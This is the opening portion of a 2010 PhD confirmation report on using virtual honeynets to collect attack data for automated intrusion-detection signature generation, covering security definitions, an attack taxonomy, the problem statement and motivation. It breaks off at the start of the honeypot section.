Novel Techniques for Intrusion Detection in Honeynets, for

Ph.D. Confirmation Report
“Implement Novel Techniques for
Intrusion Detection in Honeynets, for
Automated IDS Signature Engineering”
Fahim Abbasi
Supervisor: Prof. Richard Harris
School of Engineering & Advanced Technology (SEAT)
Massey University
March 16, 2010
© Copyright by Fahim Abbasi 2010
All Rights Reserved
1
Table of Contents
CHAPTER 1: INTRODUCTION ............................................................................................................. 5
1.1. INTRODUCTION................................................................................................................................ 5
1.2. DEFINITIONS ..................................................................................................................................... 7
1.2.1. INFORMATION SECURITY .................................................................................................................. 7
1.2.2. COMPUTER SECURITY ....................................................................................................................... 7
1.2.3. NETWORK SECURITY ......................................................................................................................... 7
1.2.4. SECURITY STANDARDS AND DOCUMENTS ........................................................................................ 8
1.3. BLACK HATS ......................................................................................................................................... 9
1.4. WHITE HATS ......................................................................................................................................... 9
1.5. ATTACKS AND ATTACK CLASSIFICATION ........................................................................... 10
1.5.1. ACTIVE ATTACKS ............................................................................................................................ 10
1.5.2. PASSIVE ATTACKS ........................................................................................................................... 10
1.6. TAXONOMY OF ATTACKS ................................................................................................................... 11
CHAPTER 2: PROBLEM STATEMENT ............................................................................................. 12
2. SECURITY PROBLEM ....................................................................................................................... 12
2.1. CURRENT SCENARIO........................................................................................................................... 12
2.2. COST .................................................................................................................................................... 13
2.3. WHAT PEOPLE SAY ABOUT SECURITY.............................................................................................. 14
2.4. NEEDS .................................................................................................................................................. 15
CHAPTER 3: MOTIVATION AND RESEARCH CHALLENGES ................................................... 15
3.1. MOTIVATION ....................................................................................................................................... 15
3.2. OBJECTS THAT DEMAND SECURITY ................................................................................................... 16
3.3. WHO IS TO BLAME? ............................................................................................................................ 17
3.4. A FEW DOCUMENTED ATTACKS ........................................................................................................ 17
3.5. MOVING TOWARDS A SOLUTION ....................................................................................................... 18
3.6. HONEYPOTS AND HONEYNETS ................................................................................................. 19
3.6.1. WHO. WHAT. WHERE, WHY AND HOW? ......................................................................................... 19
3.6.2. HONEYPOTS ................................................................................................................................. 19
2
3.6.2.1. MOTIVATION AND CONCEPT ........................................................................................................ 20
3.6.2.2. CLASSIC EXAMPLES ......................................................................................................................... 20
3.6.2.3. DISCUSSING EXPLOITS ................................................................................................................. 20
3.6.2.4. EXAMPLE: LEAVES WORM .......................................................................................................... 21
3.6.2.5. EXAMPLE: CODE RED II WORM .................................................................................................. 21
3.6.2.6. EXAMPLE: SOLARIS DTSCD EXPLOIT ........................................................................................ 21
3.6.3. HONEYNETS ................................................................................................................................. 21
3.6.3.1. DATA CONTROL ............................................................................................................................ 22
3.6.3.2. DATA CAPTURE ............................................................................................................................. 22
3.6.3.3. DATA COLLECTION ...................................................................................................................... 22
3.6.3.4. HONEYNET ARCHITECTURES ....................................................................................................... 23
3.6.3.4.1. GENERATION I ARCHITECTURE ................................................................................................... 23
3.6.3.4.2. GENERATION II AND III ARCHITECTURE: .................................................................................... 23
3.6.3.5. VIRTUAL HONEYNET ...................................................................................................................... 24
3.7. RESEARCH CHALLENGE # 1 ....................................................................................................... 24
3.7.1. ARCHITECTURE AND DESIGN CONSIDERATIONS IN VIRTUAL HONEYNETS ................................ 24
3.7.2. INTRODUCTION .................................................................................................................................. 24
3.8. RESEARCH CHALLENGE # 2 ....................................................................................................... 25
3.8.1. INTRUSION DETECTION ................................................................................................................... 25
3.8.2. INTRUSION DETECTION PROBLEM ................................................................................................. 25
3.8.3. INTRUSION DETECTION SIGNATURES............................................................................................. 26
3.8.4. AUTOMATED SIGNATURE ENGINEERING ....................................................................................... 26
CHAPTER 4: OVERVIEW OF RELATED WORKS .......................................................................... 26
4.1. HONEYPOTS AS ATTACK DETECTION AND LEARNING TOOLS .......................................................... 26
4.2. AUTOMATED SIGNATURE ENGINEERING USING HONEYPOTS ......................................................... 27
4.3. ANOMALY DETECTION ....................................................................................................................... 29
4.4. NETWORK BEHAVIOURAL ANALYSIS (NBA) .................................................................................... 30
CHAPTER 5: RESEARCH QUESTIONS ............................................................................................. 30
CHAPTER 6: METHODOLOGY REVIEW ......................................................................................... 31
6.1. PROPOSED SYSTEM FOR VIRTUAL HONEYNET ARCHITECTURE PROBLEM ........... 31
6.1.2. METHODOLOGY AND DISCUSSION .................................................................................................. 31
6.1.3. UBUNTU AS HONEYPOT ..................................................................................................................... 33
6.1.4. VMWARE AS VIRTUALIZATION SOFTWARE ..................................................................................... 34
6.1.5. HONEYWALL ROO ............................................................................................................................. 34
6.1.6. SEBEK AS DATA CAPTURE TOOL ........................................................................................................ 35
6.2. PROPOSED SYSTEM FOR AUTOMATED SIGNATURE ENGINEERING ........................... 36
3
6.2.1. DISCUSSION ...................................................................................................................................... 36
6.2.2. METHODOLOGY ............................................................................................................................... 37
6.2.2.1. ANALYSIS OF SYSTEM EVENTS .................................................................................................... 37
6.2.2.2. ANALYSIS OF NETWORK EVENTS ................................................................................................ 37
6.2.2.3. HASHING ALGORITHM FOR PAYLOAD HASHING ....................................................................... 38
6.2.2.4. CLUSTERING BY COMPRESSION .................................................................................................. 38
6.3. RESULTS AND DISCUSSION ................................................................................................................. 40
CHAPTER 7: RESULTS ......................................................................................................................... 43
7.1. SUMMARY ............................................................................................................................................ 43
7.2. ATTACK STATISTICS ........................................................................................................................... 44
7.2.1. ATTACKED PORTS AND SERVICES..................................................................................................... 44
7.2.2. ATTACKER IP'S .................................................................................................................................. 44
7.2.3. ATTACKER’S COUNTRY OF ORIGIN ................................................................................................... 45
7.3. FORENSIC ANALYSIS........................................................................................................................... 46
7.3.1. FIRST HACK ....................................................................................................................................... 46
7.3.2. BRUTE FORCE AND BOTNETS ............................................................................................................ 46
7.3.3. MORE BOTNETS ................................................................................................................................. 46
7.3.4. COORDINATED ATTACKS .................................................................................................................. 47
7.3.5. LOCAL PRIVILEGE ESCALATION ATTEMPT ........................................................................................ 47
7.3.6. FORENSICS OF AN ENCRYPTED BOTNET............................................................................................ 47
7.3.6.3. FORENSICS OF A HACKER’S IRC SESSION ...................................................................................... 48
8. ACHIEVEMENTS ................................................................................................................................ 48
9. RESEARCH PLAN .............................................................................................................................. 49
REFERENCES: ........................................................................................................................................ 50
APPENDIX - A .......................................................................................................................................... 55
SEBEK LOGS ................................................................................................................................................ 55
SSH LOGS ................................................................................................................................................... 56
List of Figures
FIGURE 1: ATTACK CONSEQUENCES VS LIKELIHOOD [84] ............................................................................................ 14
FIGURE 2: INTRUDER KNOWLEDGE VS SOPHISTICATION OF ATTACK [42] ..................................................................... 16
FIGURE 3: INCIDENTS REPORTED TILL 2003 [37, 43]..................................................................................................... 17
FIGURE 4: THREAT CATEGORIES OVER TIME BY PERCENT OF BREACHES [50] ............................................................... 18
FIGURE 5: GEN I HONEYNET ARCHITECTURE [12]........................................................................................................ 23
FIGURE 6: GENERATION III HONEYNET ARCHITECTURE [12] ....................................................................................... 24
FIGURE 7: PROPOSED VIRTUAL HONEYNET ARCHITECTURE ........................................................................................ 32
FIGURE 8: ROO LOGICAL DESIGN ................................................................................................................................. 35
FIGURE 9: BEHAVIOURAL PROFILE FOR W32-BAGLE-Q WORM [94] ............................................................................. 37
FIGURE 10: CLUSTERING BY COMPRESSION AND HASHING........................................................................................... 42
FIGURE 11: HONEYNET DATA GRAPHICAL VIEW (IP-PORT) .......................................................................................... 43
FIGURE 12: PROBED PORTS .......................................................................................................................................... 44
FIGURE 14: PROBED PORTS (EXCLUDING SSH) ................................................................................................................1
FIGURE 15: TOP 50 ATTACKS BY COUNTRY ................................................................................................................. 45
4
List of Tables
TABLE 1: WHAT PEOPLE SAY ABOUT SECURITY? ......................................................................................................... 15
TABLE 2: HONEYPOT: CLASSIC EXAMPLES .................................................................................................................. 20
TABLE 3: HONEYPOT: DISCUSSING EXPLOITS .............................................................................................................. 21
TABLE 4: HONEYPOT: LEAVES WORM.......................................................................................................................... 21
TABLE 5: HONEYPOT: CODE RED II WORM .................................................................................................................. 21
TABLE 6: HONEYPOT: SOLARIS DTSCD EXPLOIT......................................................................................................... 21
TABLE 7: SSH PATCH FOR THE HONEYPOT ................................................................................................................... 33
TABLE 8: SSH LOGS ..................................................................................................................................................... 34
TABLE 9: COMPARISON OF MD5 AND FUZZY HASHING ............................................................................................... 38
TABLE 10: PROPOSED HASHED TECHNIQUE ................................................................................................................. 40
TABLE 11: OLD TECHNIQUE (NCD ONLY).................................................................................................................... 41
TABLE 12: FORENSICS: HACK....................................................................................................................................... 46
TABLE 13: FORENSICS: BRUTE FORCE AND BOTNETS .................................................................................................. 46
TABLE 14: FORENSICS: MORE BOTNETS ....................................................................................................................... 47
TABLE 15: FORENSICS: COORDINATED ATTACKS ......................................................................................................... 47
TABLE 16: FORENSICS: LOCAL PRIVILEGE ESCALATION ATTEMPT ............................................................................... 47
TABLE 17: FORENSICS OF ENCRYPTED BOTNET ........................................................................................................... 48
TABLE 18: FORENSIC OF A HACKERS IRC SESSION ....................................................................................................... 48
Chapter 1: Introduction
1.1. INTRODUCTION
The revolution in Information Technology has provided a flood of assets in the form of
applications and services. Enterprises have based their entire business models on top
of these assets. Networks have evolved from low speed half duplex links to full duplex,
multi-homed, self convergent, gigabyte streams, controlled by advanced protocols. The
security of the available applications and services accessible over these networks
currently represents a major challenge to the IT industry. Each day, exploits, worms,
viruses and buffer overflows severely threaten the IT infrastructure and associated
business assets along with mission critical systems. By learning the tactics and
techniques used by malicious black hats, crackers, we can secure our data assets and
infrastructure. This demands learning from both system wide and network wide
resources.
5
Security is not an out of the box solution. It requires careful analysis of the environment
at hand before being able to propose a solution. It is a layered process and demands a
great deal of thorough understanding of the system and its constraints. No system is
100 percent secure, the security of a system is as strong as its weakest point [28].
Security designs based on eggshell security models have proven to be most vulnerable.
"This can be viewed as an 'eggshell' security model: hard outer shell, soft in the center."
[29]. Therefore, security should be implemented in layers based on a defence in depth
model [30] rather than an eggshell model. This considerably increases the difficulty for
an attacker to penetrate through the system, as he might have gained access to part or
a component of the entire system. It will give the system administrators enough time to
address the problem by patching or configuring his resources. Each day we witness
hundreds of thousands of vulnerabilities coming out in our everyday use software.
These vulnerabilities when exploited cause compromise to systems. Crackers write
special customized software to target these vulnerabilities. These are called worms.
Worms spread like an epidemic over the internet capable to self propagate and infect
systems at very high rates. Soon they consume millions of systems, by taking over full
control and awaiting further instructions. Many such worms install special client software
on their victims by virtue of which they chain them to their existing network of zombies.
Result is a highly distributed network of machines that on receiving a single instruction
from their owner may cause all sorts of havoc. Examples can be data and information
theft, including credit card, online bank accounts, email and other social networking
credentials. This information is a valuable asset in the underground economy, where it
is sold for a good amount of money. Available security tools where provide a good set of
static defences, cannot cope with the dynamic nature of the threats. Most network
security tools are passive in nature; like, firewalls and Intrusion Detection Systems
(IDS). They operate on available rules and signatures in their database. Anomaly
detection is thus limited only to a set of available rules. Any activity not in alignment with
such rules goes unnoticed and undetected. For analysing the tools that they use to
obtain this access we need to set up a vulnerable environment that poses as a valid
resource to any attacker, but is heavily logged. Honeypots, by design, allow you to take
the initiative by turning the tables on malicious black hats. The Honeypot system has no
production value and has no authorized activity. Thus any interaction with the Honeypot
is most likely the result of malicious intent. Honeypots do not solve the security problem
but provide data and knowledge that aids the system administrator in enhancing the
overall security of their network. This knowledge can be used as input to any early
warning systems. Over the years, researchers have successfully isolated and identified
worms and exploits using Honeypots placed in specialized architectures called
Honeynets. These are then used for signature and rule development. Honeynets are
capable of logging far more information than any other available security tools. They
give insight into attacks and attackers, their skill level, their organization as groups or
individuals, their motives and tactics; and thus, almost every aspect is logged and can
be made auditable. This information will be analysed to develop a system for automated
attack classification and signature generation.
We start the proposal by defining Computer and Network security terminology as
background to the research work to be undertaken. This is followed by a brief
description of attackers and attacks. In Chapter 2 we describe the security problem as
the problem statement for this research, along with a brief background of its evolution.
In Chapter 3 We describe the motivation for studying this domain and detail some of the
problems that are associated with it. In Section 3.5 we propose a solution to the
6
problem. In Section 3.6 we present the technology required to underpin the research
and discuss current implementations and standards. In Section 3.7 we identify the first
research challenge and discuss our experiences with the technology; here we find that
current implementations lack some vital functionality which is solved by our proposed
technique. In Section 3.8 we identify the second research challenge and discuss
problems with current technology. In Chapter 4 we give an overview of existing related
research activity. In Chapter 5 We provide a summary of the key research questions
relevant to this proposal. In Chapter 6 we propose solutions to address the problem. In
Chapter 7 we discuss results obtained so far by the technology that we have used.
Finally, we shall detail the progress we have made and the resources that have been
developed so far. We also list publications and talks that have been delivered, together
with an indication of proposed future directions with their associated milestones.
1.2. DEFINITIONS
1.2.1. Information Security
“Information security deals with those administrative policies and procedures for
identifying, controlling, and protecting information from unauthorized manipulation. This
protection encompasses how information is processed, distributed, stored, and
destroyed” [31]
1.2.2. Computer Security
“A computer is secure if you can depend on it and its software to behave as you
expect.” [32]
Computer security is essential [33]:
:
• “To prevent theft of or damage to the hardware
• To prevent theft of or damage to the information
• To prevent disruption of service”
1.2.3. Network Security
“Network security refers to all hardware and software functions, characteristics,
features, operational procedures, accountability measures, access controls, and
administrative and management policy required to provide an acceptable level of
protection for hardware, software, and information in a network”. [31]
Network security is the art of securing preventing and protecting network resources and
assets such as routers, servers, hosts and any device connected with the organizations
network from unauthorized and unwanted access that may cause threats,
vulnerabilities, and denial of service, modification, destruction or disclosure of
information against these network assets.
7
Network security is a term that resides under information security and demands
securing all information assets connected to a network as well as securing all
information passing through the network.
1.2.4. Security Standards and Documents
The ITU-T Security Architecture for Open System Interconnection (OSI) document
X.800 and RFC 2828 are the standard documentation defining security services. X.800
divide the security services into 5 categories and 14 specific services which can be
summarized as:
“1. AUTHENTICATION:
The assurance that the communicating entity is the one that it claims to be.
It includes:
Peer Entity Authentication
Data Origin Authentication
2. ACCESS CONTROL:
The prevention of unauthorized use of a resource (i.e., this service controls who can have
access to a resource, under what conditions access can occur, and what those accessing the
resource are allowed to do).
3. DATA CONFIDENTIALITY:
The protection of data from unauthorized disclosure.
It includes:
Connection Confidentiality
Connectionless Confidentiality
Selective-Field Confidentiality
Traffic Flow Confidentiality
4. DATA INTEGRITY:
The assurance that data received are exactly as sent by an authorized entity (i.e., contain no
modification, insertion, deletion, or replay).
It includes:
Connection Integrity with Recovery
Connection Integrity without Recovery
Selective-Field Connection Integrity
Connectionless Integrity
Selective-Field Connectionless Integrity
5. NONREPUDIATION:
Provides protection against denial by one of the entities involved in a communication of having
participated in all or part of the communication.
It includes:
Nonrepudiation, Origin:
Nonrepudiation, Destination:
8
[8], [9], [1]
1.3. Black Hats
Black hats are highly skilled hackers or computer professionals who use their skill and
knowledge to gain illegitimate access to computer and information systems. They are
often socially, economically, financially or politically (hactivist) motivated in their cause.
Often they are driven by their zeal and curiosity to learn about computer systems and
their secrets. Their goal is to exploit flaws or vulnerabilities in systems and use them for
their gain. These can be exploiting computer systems or humans – social engineering.
Black hats use technology for identity theft, vandalism, credit card fraud, phishing,
intellectual property theft (piracy) and many other types of sophisticated crimes. In
general terms this can lead to illegal control of remote computing resources via a
network, having illegal access to software by cracking, collect victims information using
spyware, scan their victims for exploits or enumeration using various scanners,
writing software that self-replicates and exploits all network accessible systems such as
worms and viruses, infecting their victims with backdoors, rootkits and trojans for
remote access, creating an army of such remotely controlled zombie systems usually
over irc – botnets, and finally launching Denial of Service(DOS) and Distributed
Denial of Service (DDOS) attacks to knock their targets offline or cease their service
temporarily. These attackers can be 13 year old novice users playing around with
powerful hacking tools – scriptkiddies. Or very sophisticated and elite system and
network administrators – 1337 (a term used by the more sophisticated or elite hackers).
Black hat hackers are the biggest threat both internal and external to the IT
infrastructure of any organization, as they are consistently challenging the security of
applications and services. Black hats are called “blackhats” in correspondence to colour
of their hat representing their intent as shown in many western movies and throughout
media representing outlaws and bad guys; however, some computer geeks find the
black colour more appealing.
1.4. White Hats
White hats are ethically opposed to the blackhats. White hat hackers utilize their skill
and knowledge in securing, protecting and preventing attackers from accessing
information and computer systems illegally. They study all the blackhat threats and
devise mechanisms for identification, protection and prevention in the form of security
policies and tools. They are constantly checking and correcting systems for
vulnerabilities and exploits and have devised mechanisms for quick update and
distribution of their research and knowledge amongst the community to secure systems.
White hat hackers are considered as the white knights or the good guys and protectors.
They are the defenders of the cyber frontier that is always under attack by the black
hats. Attacking or defending, hackers have played a major role in evolving today's
technology and services. No system is 100% secure, thus a principal requirement is to
9
strengthen the mechanisms used to study the black hats and defend our information
assets.
1.5. Attacks and Attack Classification
Generally attacks are categorized under 2 major categories:
1. Active Attacks
2. Passive Attacks
1.5.1. Active Attacks:
Active attacks involve the attacker taking the offensive and directing malicious packets
towards its victims in order to gain illegitimate access of the target machine such as by
performing exhaustive user password combinations as in brute-force attacks. Or by
exploiting remote and local vulnerabilities in services and applications that are
termed as 'holes'. Other types of attacks include:
Masquerading attack when attacker masquerades or pretends to be a different entity,
Replay attack in which attacker captures data and retransmits it to produce an
unauthorized effect. Modification attack in which a message or file is modified by the
attacker to achieve his malicious goals. and finally when the attackers try knock a
machine or resource offline to disrupt or delay a service it is termed as a denial of
service (DOS) attack. TCP and ICMP scanning is also a form of active attacks in
which the attackers exploit the way protocols are designed to respond. E.g. ping of
death, syn attacks etc.
In all types of active attacks the attacker creates noise over the network and transmits
packets making it possible to detect and trace the attacker. Depending on the skill level,
it has been observed that the skill full attackers usually attack their victims from proxy
destinations that they have victimized earlier.
1.5.2. Passive Attacks
Passive attacks involve the attacker being able to intercept, collect and monitor any
transmission sent by their victims. In the process, they can eavesdrop on their victim
and they are able to listen in to their victim’s or target’s communications. Passive
attacks are very specialized types of attacks which are aimed at obtaining information
that is being transmitted over secure and insecure channels. Since the attacker does
not create any noise, or minimal noise, on the network, it is very difficult to detect and
identify them.
Passive attacks can be divided into 2 main types, the release of message content and
traffic analysis.
Release of message content involves protecting message content from getting in
hands of unauthorized users during transmission. This can be as basic as a message
delivered via a telephone conversation, instant messenger chat, email or a file.
10
Traffic analysis involves techniques used by attackers to retrieve the actual message
from encrypted intercepted messages of their victims. Encryption provides a means to
mask the contents of a message using mathematical formulas and thus make them
unreadable. The original message can only be retrieved by a reverse process called
decryption. This cryptographic system is often based on a key or a password as input
from the user. With traffic analysis the attacker can passively observe patterns, trends,
frequencies and lengths of messages to guess the key or retrieve the original message
by various cryptanalysis systems
1.6. Taxonomy of attacks
Attack classification has always been an interesting area for security researchers. As a
first step, Computer Incident Response Teams (CIRT), are required to classify the
attacks at hand in their reports. This classification should be complete enough to give
an in-depth view of the attack, the attacker, the target and the vulnerability exploited.
Based on this classification, a mitigation plan is proposed. Many classification
techniques have been proposed and adopted and later replaced by better techniques
over the years. Based on taxonomical work conducted by Hansman et.al on
characterization and dimensioning of computer and network attacks we can classify
attacks as [37]:









Virus: self-replicating program that propagates through some form of infected
files
Worms: self-replicating program that propagates through network services on
computers or through email.
Trojans: a program made to appear benign that serves some malicious purpose
Buffer overflows: a process that gains control or crashes another process by
overflowing the other process’s buffer
Denial of service attacks: an attack which prevents legitimate users from
accessing or using a host or network
Network attacks: attacks focused on attacking a network or the users on the
network by manipulating network protocols, ranging from the data-link layer to
the application layer
Physical attacks: attacks based on damaging physical components of a network
or computer
Password attacks: attacks aimed at gaining a password
Information gathering attacks: attacks in which no physical or digital damage is
carried out and no subversion occurs, but in which important information is
gained by the attacker, possibly to be used in a further attack
11
Chapter 2: Problem Statement
2. SECURITY PROBLEM
2.1. Current Scenario
Cyber crime has taken off from being a vague report of a victim’s Yahoo or Hotmail
account being hacked, or a student changing his grades in the school database, to an
entire underground industry with its own underground economy. Data being the raw
material for this industry is continually being ripped out and harvested from globally
distributed computers at an industrial scale. Malicious hackers and crackers act as the
workforce and enablers of this industry. The industry makes revenue by selling their
finished products (Credit Card details, authentication credentials, malware etc) and
services (customized malware and support to use it) to the general public. All is
available in this market, sophisticated customized malware scripts, to a network of a
hundred thousand node botnet for hire.
Entire industry of cyber criminals is creating non-stop sophisticated malware causing
data breaches from network connected computers all across the globe. Cyber crimes
are easy to commit due to lack of policies or their implementation within a state or
across borders. The Internet crime industry is getting highly lucrative. [38]
Malware getting more targeted, harder to detect, harder to remove. Security arena has
witnessed a huge change in the threat landscape, by emergence of mobile devices and
virtualization. Threats now are getting mobile and pervasive over the cloud. VM sprawl
big security concern as VM’s sprouting out like mushrooms from the ground, often miss
configured to the dismay of the security engineer. All these events contributing to
weakened grip on security as the “Protect, Detect, and React paradigm” being harder to
implement. [30]
Solera networks have suggested a threat classification in their whitepaper [84]. These
network threats are classified into four categories:
1. Threats coming in
2. Threats invited in
3. Threats already in
4. Threats going out.
Network perimeter attacks, such as XSS and SQL injections exploit vulnerabilities in
pubic web portals to steal sensitive proprietary data from backend databases including
sensitive user information. Such attacks incorporate for incoming threats. [84]
Social and technological attacks, from emails phishing for information or inviting users
to be victimized by drive-by downloads, and online social interactions which innocently
request personal or confidential information are credited [84] for the threats invited in.
Threats already inside the network claim to be the most dangerous threats. This can be
due to compromised systems or a renegade employee. If left unattended, the damage
12
potential of these threats can quickly escalate. Being inside the network, an attacker
can do nearly anything that they desire. [84]
The threat leading to the exodus of sensitive data from a business enterprise is critical.
This can result in jeopardizing confidential trade secrets, customer information like
social security numbers or credit cards, or classified national security information like
security plans for the head of state or parliamentarians’. The attackers may also turn the
business network to meet their personal underground business needs like active spambots that can push out bulk emails. [84]
Many organizations implement their security limited only to perimeter security. An
enterprise faces constant threat from “things coming in” due to perimeter penetration. It
is also termed as “walking through the front door”. This can be due to technical
vulnerabilities such as SQL injection, browser, flash, media player or can be a social
vulnerability. Once an attacker has managed to bring down that wall then very bad
things can happen. Since traditional perimeter defences are facing the outside network
they are blind to the inside. This can lead to emergence of flows comprising of traffic
from bots, spambots, content distribution nodes and other sensitive data leakage from
inside the network to the outside world. A survey conducted by the FBI and Computer
Security Institute, reported that over 70 percent of the loss of confidential information
comes from inside the organization. The security model must be layered, where internal
assets are secured, partitioned, and monitored. [39] Need for a defence in depth
strategy is ever so felt now.
In the realm of security, response time is critical and saves money. There are many
threats that an organization is prone to, with a very small subset of them marked as
known threats. The only way to respond to breaches quickly and effectively is by doing
root cause analysis.
Surveillance is vital to security. We all expect a breach but our existing tools don’t help
us when it happens. It’s synonymous to the situation in the real world where we have
security cameras everywhere. They monitor everything but don’t respond. It’s the
vigilance of the surveillance expert to identify event of interest and report it. There is a
dire need to look out for events of interest.
Cohen et al [40] established the security problem as:
“Our society is so reliant on information that the loss or corruption of the United States’
information infrastructure would create a situation where the national banking system,
electric power grid, transportation systems, food and water supplies, communication
systems, medical systems, emergency services, and most businesses [could not]
survive.”
“Organizations that value their internal information realize that information is a strategic
and competitive tool [41].
2.2. Cost
As attacks are ongoing they tend to get more and more expensive. Direct costs include:
13
downtime, IT resources, stolen data or IP. Indirect costs include follow on incidents,
impact to brand remediation for maximum scope. The faster we may be able to find the
source and scope of the breach, the less expensive it will be for us.
Figure 1: Attack Consequences vs Likelihood [84]
2.3. What People Say About Security
Symantec predicts: In 2010, 'antivirus is not enough'
December 10th, 2009
"...the industry is quickly realizing that traditional approaches to antivirus, both
file signatures and heuristic/behavioural capabilities, are not enough to protect
against today's threats."
Network Solutions Warns Merchants After Hack
600,000 credit card numbers stolen from Ecommerce Hosting merchants
Robert McMillan — July 7, 2009
NY Times Website Infected With Fake Antivirus
September 15th, 2009
"It's a fake page for a nonexistent antivirus app, which is actually malware...It's a
multimillion dollar business"
Annual Threat Assessment of the US Intelligence Community for the Senate
Select Committee on Intelligence
February 2nd, 2010
"Sensitive information is stolen daily from both government and private sector
networks... We often find persistent, unauthorized, and at times, unattributable
presences on exploited networks... We cannot be certain that our cyberspace
infrastructure will remain available..."
Hackers are defeating tough authentication, Gartner warns
January 18th, 2010
"Cybercriminals are using increasingly sophisticated tactics to outmaneuver
security systems so they can steal customers' log-in credentials and pillage their
14
bank accounts, according to a Gartner analyst"
Google Hack Attack Was Ultra Sophisticated
January 14th, 2010
"Hackers...used unprecedented tactics that combined
programming and an unknown hole in Internet Explorer"
encryption,
stealth
More Victims Of Chinese Hacking Attacks Come Forward
January 14th, 2010
"This attack involved very advanced methods, with several pieces of malware
working in concert to give the attackers full control of the infected system, at the
same time it attempts to disguise itself as a common connection to a secure
website"
U.S. Army Website Hacked
January 12th, 2010
"Every organization has these problems...They may not realize it, but they're just
waiting for a smart kid to come along and copy off every critical piece of
information they have"
Table 1: What People say about security?
2.4. Needs
Lessons learned from history point towards a need of re-evaluation of current
techniques. These can be summarized as the needs:













Need to stop and remediate events quickly.
Need to do more and find root cause of breaches.
Need better Forensic analysis and tools
Need for techniques to gleam information from the data.
Need for consistent policies across borders
Need for stronger passwords or keys.
Need to secure application level vulnerabilities.
Need for automation in security industry.
Need for more dynamic security technology
Need to get information out of systems intelligently, logging in depth, better log
management, better log analysis and better management roles
Need to know what to protect and how to protect
Need to know the threat you face, know your enemy
Requirement to be vigilant and responsive.
Chapter 3: Motivation and Research Challenges
3.1. Motivation
Security is a collective effort and demands thorough planning. Unfortunately in the past
it has always been overlooked and never considered a real problem. The need for
securing data and information assets really got felt publically after the commercialization
of the internet in the late 1980’s. Paula [41] has correlated this with emergence of the
15
first virus in 1988 “Therefore, in the fall of 1988 the world saw evidence of the true
threats that existed to network security. The Internet Virus was launched at that time
and all of the 60,000 computers on the Internet were crippled for two entire days”
Historical study [41] reveals that the first ever published document on security became
“Trusted Computer Security Evaluation Criteria” which was a host hardening manual
ignoring the network security aspects.
There were no real threats felt as the early internet was shared between very few
organizations mostly to conduct, collaborate and share research. As Paula [41] states:
“Before this, more emphasis was laid down on running, maintaining and expanding the
Arpanet. “People who used the ARPAnet were scholars and government employees
who were at the time more concerned with discovery than with destruction”
Over the years we have observed a sharp increase in the intricacy, sophistication and
overall frequency of attacks. Availability of user friendly hack tools has claimed a great
share of these attacks which do not demand a great deal of understanding from their
users. Lipson (2002) has studied and correlated this trend graphically as:
Figure 2: Intruder knowledge vs sophistication of attack [42]
3.2. Objects that demand security




Operating Systems not designed with much security in mind. (win9x, winnt, xp,
linux)
Applications not designed with security in mind. (office applications, web
browsers)
Services not designed with security in mind.(ftp, telnet, http, r-services)
Miss configured folder permissions, let ordinary system users access sensitive
system files.
16

Miss-configured networks, exposing disk shares and other information resources
to the outside world with full permissions.
3.3. Who is to Blame?




Why everything is considered secure by default till exploited?
Blame the Coders?
Blame the architects/designers?
What about users which keep weak or easily guessable passwords? Blame the
human?
Time has proven that security is a collective effort. We can only blame ourselves for not
thinking about security while coding, designing, testing or implementing software and
hardware. It wasn’t till organizations were ripped off of data till they realized the
magnitude of the problem and started work to devise a solution for it.
3.4. A Few Documented Attacks
Since 1999 there has been a tremendous increase in the number of incidents reported
as statistics from the Computer Emergency Response Team Coordination Center
(CERT/CC) (CERT, 2003)
Figure 3: Incidents reported till 2003 [37, 43]
A few notable incidents are documented here:




FBI statistics state that up to five billion dollars is lost each year due to
information theft through computer crimes>
285 million records were compromised in 2008.
In 2009, 10 million USD were stolen worldwide using ATM cards in less than 24
hours. These thefts were conducted by a well-organized band of bank robbers.
[38]
“US-CERT is aware of public reports indicating a widespread infection of the
Conficker/Downandup worm, which can infect a Microsoft Windows system from
a thumb drive, a network share, or directly across a corporate network, if the
17







network servers are not patched with the MS08-067 patch from Microsoft.
Researchers have discovered a new variant of the Conficker Worm on April 9,
2009.” [49]
Increase in web based and application hacks as per Verizon report. [50]
Verizon data breach report of 2009 reveals that behind data breaches : [50]
74% resulted from external sources, 20% were caused by insiders, 32%
implicated business partners, and 39% involved multiple parties (+ 9%). [50]
The scales for breaches were:
67% were aided by significant errors, 64% resulted from hacking, 38% utilized
malware,
22% involved privilege misuse (+7%), 9% occurred via physical attacks. [50]
85% organizations had a major network incident in the past 3 years or expect a
major incident in next 3 years. [50]
Figure 4: Threat categories over time by percent of breaches [50]
3.5. Moving Towards a Solution
Security tools themselves cannot save us from the onslaught of the malicious black hat
crackers. These tools require intelligent use and configuration before being effective
enough. Stephen Northcutt and Judy Novak have established this in their book as,
“Intrusion detection is not a specific tool but a capability, a blending of tools and
techniques” [51]
Flawed assumptions made by security tools lead to fake sense of security. E.g. what
use is antivirus software if it is not updated frequently? What use is a firewall if the user
does not know how to configure it and relies on default policies every time? Same goes
for IDS and IPS. Networks are becoming more scalable and rapidly evolving. It’s a world
of dynamic services and dynamic networks, attracting dynamic threats.
18
Available static defences like AV systems, Firewalls and IDS are not sufficient enough.
They involve too much manual input from humans. They require hours of analysis till
new rules, signatures can be produced, meanwhile the threat is running out in the wild
infecting and claiming more and more resources. Most network security tools are
passive in nature; like, firewalls and Intrusion Detection Systems (IDS). They operate on
available rules and signatures in their database. Anomaly detection is thus limited only
to these set of available rules. Any activity not in alignment with those rules goes
undetected. Research remains the most effective way to understand vulnerabilities, how
they are identified and how they are exploited. Hacker tools used to exploit these
vulnerabilities and the tactics involved. By learning the tactics and techniques used by
the malicious black hats we can secure our IT assets and infrastructure. Honeypots
provide a means to study black-hat techniques and tactics by which they gain
illegitimate access to system resources along with methods to analyse the tools they
use. This is achieved by setting up a vulnerable environment that poses as a valid
resource to any attacker, but is heavily logged.
The most ideal solution to meet the security challenges of today is a comprehensive
vulnerability management program that detects all sorts of intrusions, threats and
exploits, analyses them, correlates the events that occurred and generates automated
proactive responses to the newly identified weaknesses. This thesis will aim to achieve
some or part of this idea. Our research will focus on Intrusion Detection and creation of
an automated signature engineering system, as an active response for mitigation.
We have divided the research into 2 main phases:
1. Deployment of Honeypot sensors in Honeynets to collect real-time data on
intrusions and attacks.
2. Automated analysis of attack data to identify, classify and cluster attacks to serve
as input for signature generation.
3.6. Honeypots and Honeynets
3.6.1. Who. What. Where, why and how?
The first step towards achieving my research goals involved setting up Honeypot sensor
nodes. These sensors will aid us in understanding who the attackers are. What methods
and tools do they use to attack? Where do they get the knowledge and tools from? Why
do they attack us? How do they organize and gain access to so many victim machines
simultaneously?
3.6.2. Honeypots
